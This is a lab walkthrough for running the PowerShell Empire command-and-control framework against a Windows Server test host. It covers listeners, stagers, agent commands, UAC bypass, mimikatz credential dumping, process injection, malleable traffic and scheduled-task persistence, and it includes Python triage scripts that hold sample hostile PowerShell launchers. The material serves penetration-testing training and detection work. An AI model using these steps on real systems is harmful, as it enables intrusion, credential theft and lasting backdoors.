C2 OPERATION:

  1. Power on the main Kali Linux virtual machine (not the clone), open a Terminal, and run ifconfig eth0 (substitute whichever interface is attached to your NAT network) to determine the IP address on that interface, as shown below:
c2_op_1
  2. The machine with this IP address will act as the Empire server, while the clone VM will act as the Empire client.
  3. Start the MariaDB service on the main Kali VM (not the clone):
c2_op_2
  4. Next, use the following command to start the Empire server on the main Kali Linux virtual machine:
sudo powershell-empire server

c2_op_3
  5. Next, power on the Empire client (the clone of Kali Linux) virtual machine and use the following command to edit the Empire client configuration file and insert the Empire server's details:

sudo nano /etc/powershell-empire/client/config.yaml
  6. Add the following entry at the end of the servers list. The file is YAML, so the entry must be indented to match the existing entries; the name Empire-Server is what you will pass to connect later:
  Empire-Server:
    host: http://192.168.83.128  # IP of the main Kali machine running the Empire server
    port: 1337
    socketport: 5000
    username: empireadmin
    password: password123

empireadmin / password123 are Empire's default credentials. They are acceptable in an isolated lab, but change them in the server configuration (and here) before port 1337 is reachable from anything other than your lab network.

c2_op_4
  7. Now start the Empire client on the cloned Kali machine:

sudo systemctl start mariadb.service
sudo powershell-empire client

c2_op_5
  8. Establish the connection to the Empire server. Before that, make sure the main Kali machine's firewall is not blocking incoming TCP connections on port 1337 (if ufw is active with a default deny policy, the socket port from the client config, 5000, needs the same rule). Run the following:

# on main kali machine
sudo ufw status
sudo ufw allow 1337/tcp

c2_op_6

# on EMPIRE CLIENT machine
(Empire) > connect -c Empire-Server

c2_op_7 c2_op_8

The same steps can also be carried out on a single Kali machine by running the server and the client in separate terminal tabs.


Managing users on Empire:

  1. On the Empire client console, execute the following commands to access the administrative menu and view the list of current user accounts:
(Empire) > admin
(Empire: admin) > user_list

c2_op_9
  2. To create a new user on the Empire server, use the create_user command with the username NewUser1 and the password Password123 entered twice (password and confirmation), followed by admin as the final argument; then list the users again to confirm the account exists:

(Empire: admin) > create_user NewUser1 Password123 Password123 admin
(Empire: admin) > user_list

c2_op_10
  3. To disable a user account, use the disable_user <User_id> command:

(Empire: admin) > disable_user 1001
  4. To view the list of commands and options available in the current context menu, use the help command.
  5. The back command returns you to the previous menu, and the main command takes you to Empire's main menu.

Post exploitation using Empire:

  1. We will be using the Windows Server 2019 VM as the target system for this exercise.

Creating a listener:

  1. A listener is a module within the Empire server that listens for an incoming connection from an agent running on a compromised host. Without a listener on the Empire server, you won’t be able to send instructions to the agents that are running on the compromised systems.
  2. On the Empire client console, use the following command to set up an HTTP listener:
(Empire) > uselistener http

c2_op_11
  3. Change the name of the default listener using the command set Name <New_name>:

(Empire: uselistener/http) > set Name DC_Listener
  4. Next, configure the callback host and port. The host is the IP address on the eth0 interface of the Kali Linux machine running the Empire server (on the 192.168.83.0/24 network), and the port is where the agents will call back, so it must be allowed through the server's firewall as well:
(Empire: uselistener/http) > set Host 192.168.83.128
(Empire: uselistener/http) > set Port 1335 # this port was opened in ufw on the main Kali machine before running the command
  5. Type options to verify the changes.
  6. Start the listener with the execute command.
  7. Use the back command (a few times if needed) to return to the main menu, then run the listeners command to see the listeners you have set up:
(Empire: uselistener/http) > listeners

c2_op_12
The listener has been set up and is waiting for incoming connections.


Creating a stager:

A stager is a module within Empire that generates the launcher used to execute the agent (payload) on the targeted system. When the agent runs on a compromised host, it attempts to establish a connection back to the listener on the Empire server running on Kali Linux, which lets the penetration tester perform post-exploitation tasks through any active agent.

  1. On the Empire client console, let’s create a multi-launcher stager by using the following command:
(Empire) > usestager multi_launcher

c2_op_13
  2. Next, set the Listener option to DC_Listener:

(Empire: usestager/multi_launcher) > set Listener DC_Listener
  3. Generate the launcher (the malicious PowerShell code) with the generate command:
(Empire: usestager/multi_launcher) > generate

c2_op_14
  4. Next, open a new Terminal on the main Kali machine and use Evil-WinRM to establish a PowerShell session on the Windows Server 2019 target (the target's local Administrator credentials are used here):

evil-winrm -i 192.168.83.140 -u Administrator -p P@ssword1

c2_op_15
  5. Paste the generated launcher into the Evil-WinRM session and run it; the agent should then connect back to DC_Listener.
c2_op_16 c2_op_17
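The generate step above produces a one-liner of the form powershell -noP -sta -w 1 -enc <base64> (the exact flags vary with the launcher options), where the base64 is the UTF-16LE encoding of the real script. The following Python is an added example, not code from this page or from the Empire project: it rebuilds such a launcher from a constructed script (the script text and the callback address 192.168.83.128:1335 are assumptions for the example; the script is inert), decodes the -enc argument the way PowerShell's -EncodedCommand does, and triages the result for the traits a defender keys on. Nothing here contacts the network.

```python
import base64
import re
import shlex
from typing import Dict, Optional

# Constructed sample script, shaped like the start of an Empire multi_launcher
# (version check, AMSI tamper, WebClient callback). Invented for this example;
# it is not the real stager and does nothing useful if executed.
SAMPLE_SCRIPT = (
    "IF($PSVeRsIoNTABle.PSVeRSiON.MAjOR -gE 3){"
    "$Ref=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')};"
    "$wc=New-Object System.Net.WebClient;"
    "$ser='http://192.168.83.128:1335';$t='/admin/get.php';"
    "$data=$wc.DownloadData($ser+$t);"
)

# Indicators a defender looks for in the launcher line and the decoded script.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "no_profile": re.compile(r"-no(?:p|profile)\b", re.I),
    "amsi_tamper": re.compile(r"AmsiUtils|amsiInitFailed", re.I),
    "webclient_download": re.compile(r"Net\.WebClient|DownloadData|DownloadString", re.I),
}
# First URL in the script is the listener's Host:Port.
CALLBACK = re.compile(r"https?://[\w.\-]+(?::\d+)?", re.I)


def encode_launcher(script: str) -> str:
    """Build a launcher line the way -EncodedCommand expects it:
    UTF-16LE encode the script, then base64 encode the bytes."""
    b64 = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return f"powershell -noP -sta -w 1 -enc {b64}"


def decode_launcher(cmdline: str) -> Optional[str]:
    """Return the script carried by a powershell -e/-ec/-enc/-EncodedCommand
    launcher, or None if the command line has no (valid) encoded command."""
    tokens = shlex.split(cmdline)
    for i, tok in enumerate(tokens[:-1]):
        low = tok.lower()
        # PowerShell accepts -ec and any unambiguous prefix of -EncodedCommand.
        if low == "-ec" or (low.startswith("-e") and "-encodedcommand".startswith(low)):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage(cmdline: str) -> Dict[str, object]:
    """Decode the launcher, flag indicators over launcher + script, and pull
    the first callback URL out of the decoded script."""
    script = decode_launcher(cmdline)
    haystack = cmdline + ("\n" + script if script else "")
    hits = {name: bool(rx.search(haystack)) for name, rx in INDICATORS.items()}
    m = CALLBACK.search(script) if script else None
    return {"decoded": script, "indicators": hits, "callback": m.group(0) if m else None}


if __name__ == "__main__":
    launcher = encode_launcher(SAMPLE_SCRIPT)
    result = triage(launcher)
    print(launcher[:60] + "...")
    print("callback:", result["callback"])
    print("indicators:", sorted(k for k, v in result["indicators"].items() if v))
```

The callback URL recovered by triage is the listener Host and Port configured earlier, which is why defenders can pivot from a single captured command line to the C2 address; on the offensive side this is also a quick check that the launcher you pasted really points at the listener you meant.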


Working with agents:

  1. To view the list of agents inside the Empire client, use the agents command:
c2_op_18
I have multiple sessions here, but you should have one session for now.
  2. Whenever you see an asterisk (*) next to the name of an agent, that agent is running with elevated privileges.
  3. To interact with an agent use the command interact <agent_id>:
c2_op_19
Use the help command to list the commands that can be run against the agent:
c2_op_20 c2_op_21
  4. Additionally, to determine whether the agent is running with elevated privileges on the compromised host, use the following command:

(Empire: YDPKMU42) > display high_integrity

c2_op_22
  5. If the agent is not running with elevated privileges, you can use the bypassuac command to escalate; its argument is the listener the new, elevated agent should call back to:

bypassuac DC_Listener
  6. To remotely execute a command on the compromised host, use the shell <command> command:
(Empire: YDPKMU42) > shell whoami
(Empire: YDPKMU42) > shell ipconfig

c2_op_23
  7. Running mimikatz for credential dumping (this needs an elevated agent):
c2_op_24
  8. To see the harvested credentials, use the credentials command:
c2_op_25


Creating a new agent:

During a penetration test, having multiple connections or reverse shells on a compromised host is especially useful in case one shell is unexpectedly terminated. With Empire you can spawn additional agents on the same compromised host from an existing agent, using the following instructions. (In my screenshots I am already running two shells on the same machine and used two different agents.)

  1. Interact with the agent first:
c2_op_26
  2. List all the processes using the ps command:
c2_op_27
  3. Pick the PID of a common, inconspicuous process, such as wsmprovhost, to spawn the new agent into. Note that wsmprovhost.exe is the WinRM host process: if you inject into the one hosting your own Evil-WinRM session, the new agent dies as soon as that session is closed, so a long-lived process gives a more durable agent.
c2_op_28
  4. Create the new agent with the psinject command, giving it the listener to call back to and the target PID:
(Empire: CSM26U8L) > psinject DC_Listener 2268

c2_op_29
  5. As shown in the preceding screenshot, the new agent has spawned. Notice that it was created with elevated privileges because wsmprovhost was running under the local Administrator account. If a new agent is not running with elevated privileges, you will not be able to perform administrative or high-privilege tasks on the compromised host through it and will need to elevate its privileges first.
  6. Use the following commands to interact with the compromised host and spawn a command shell in the Empire client:
c2_op_30


Threat emulation:

Threat emulation tests an organization's cyber defenses and their capability to detect and prevent the techniques used by threat actors. Using Empire's malleable HTTP listener during a penetration test checks whether the targeted organization can detect unknown threats whose traffic is disguised as common, legitimate traffic such as Windows Update, Gmail, or Office 365.

  1. On the Empire client, use the http_malleable listener module:
(Empire: agents) > uselistener http_malleable

c2_op_31
  2. Follow the screenshots to set up the listener. The http_malleable listener shapes its requests and responses according to the malleable C2 profile selected in its Profile option, so the profile, not the listener by itself, is what makes the traffic resemble Windows Update or Office 365 traffic:
c2_op_32
Use port 9443, and make sure incoming connections on this port are allowed on the server machine so that the reverse shells can reach it:
c2_op_33
  3. Then create a new stager for the ThreatEmulation listener:
c2_op_34 c2_op_35
  4. Paste and execute the malicious code inside the Evil-WinRM session on the target:
c2_op_36
  5. A new session should check in inside the Empire client:
c2_op_37
  6. Interact with the agent:
c2_op_38 c2_op_39


Setting up persistence:

Establishing persistence on a compromised host ensures you can regain access whenever the host is online on the target network, including after a reboot or after defensive measures are applied. During a penetration test, only do this if it is part of the agreed engagement.

Important

When setting up persistence, please be mindful that the persistence modules may create intentional backdoors on the compromised systems, which may allow other threat actors to gain access. Persistence should only be used during a penetration test if it is needed or within the scope of the engagement. If you set up persistence on compromised hosts during your penetration test, be sure to remove it at the end of your penetration test to prevent unauthorized access by other threat actors.

  1. Start by interacting with an active agent that has elevated privileges and load the scheduled-task persistence module:
(Empire: X65ZRGUH) > usemodule powershell_persistence_elevated_schtasks

c2_op_40
  2. Review the options (in particular the task name and where the payload is stored, which you will need for cleanup at the end of the engagement), then execute the module:
c2_op_41
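Because this module leaves behind a scheduled task (and, depending on its options, a payload stored in the registry) that has to be removed at the end of the engagement, the following Python is an added example, not code from this page or from Empire: it reads the output of schtasks /query /fo CSV /v, scores each task's action for the traits this kind of persistence shares, and emits the cleanup commands for anything above a threshold. The CSV is constructed for the example and cut down to the columns read here; the \Updater task name, its hidden-window PowerShell action, and the HKLM:\Software\Microsoft\Network\debug registry location are assumptions about what the module plants, not values taken from the page.

```python
import csv
import io
import re
from typing import Dict, List

# Constructed sample of `schtasks /query /fo CSV /v`, cut down to the columns
# read below. The \Updater row is an assumed shape for the task the Empire
# schtasks persistence module plants (name, action and registry path are
# assumptions for this example); the other two rows are typical benign tasks.
SAMPLE_CSV = r'''"HostName","TaskName","Status","Author","Task To Run","Run As User","Schedule Type"
"DC01","\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan","Ready","N/A","C:\Program Files\Windows Defender\MpCmdRun.exe -IdleTask -TaskName WdScheduledScan","SYSTEM","Multiple"
"DC01","\GoogleUpdateTaskMachineUA","Ready","N/A","C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua /installsource scheduler","SYSTEM","Hourly"
"DC01","\Updater","Ready","DC01\Administrator","powershell.exe -NonI -W hidden -c ""IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKLM:\Software\Microsoft\Network debug).debug)))""","SYSTEM","Daily"
'''

# (name, pattern matched against the "Task To Run" column, weight)
RULES = [
    ("script_host", re.compile(r"\b(?:powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32)(?:\.exe)?\b", re.I), 1),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{40,}", re.I), 3),
    ("inline_decode_exec", re.compile(r"(?:IEX|Invoke-Expression).*FromBase64String", re.I), 3),
    ("payload_in_registry", re.compile(r"\b(?:gp|Get-ItemProperty)\s+HK(?:LM|CU):", re.I), 3),
    ("remote_download", re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I), 2),
]
# Registry key and value name read by the action, for the registry cleanup hint.
REG_REF = re.compile(r"\b(?:gp|Get-ItemProperty)\s+(HK(?:LM|CU):\\[^\s)]+)\s+(\w+)", re.I)


def audit_tasks(csv_text: str, threshold: int = 4) -> List[Dict[str, object]]:
    """Score every task's action; return the tasks at or above threshold
    together with the commands needed to remove them."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        action = row["Task To Run"]
        hits = [name for name, rx, _ in RULES if rx.search(action)]
        score = sum(w for name, _, w in RULES if name in hits)
        if score < threshold:
            continue
        finding: Dict[str, object] = {
            "host": row["HostName"],
            "task": row["TaskName"],
            "run_as": row["Run As User"],
            "author": row["Author"],
            "schedule": row["Schedule Type"],
            "score": score,
            "hits": hits,
            # schtasks needs the full task path; /f skips the confirmation prompt.
            "cleanup": f'schtasks /delete /tn "{row["TaskName"]}" /f',
        }
        m = REG_REF.search(action)
        if m:
            # Deleting the task alone leaves the payload in the registry.
            finding["registry_cleanup"] = (
                f"Remove-ItemProperty -Path '{m.group(1)}' -Name '{m.group(2)}'"
            )
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit_tasks(SAMPLE_CSV):
        print(f"{f['host']} {f['task']} score={f['score']} hits={f['hits']}")
        print("  ", f["cleanup"])
        if "registry_cleanup" in f:
            print("  ", f["registry_cleanup"])
```

Run it against the real output on the target (schtasks /query /fo CSV /v > tasks.csv, then feed the file to audit_tasks) both before and after cleanup: the second run should return nothing for the task you created, which is the evidence you want in the report that the backdoor was removed.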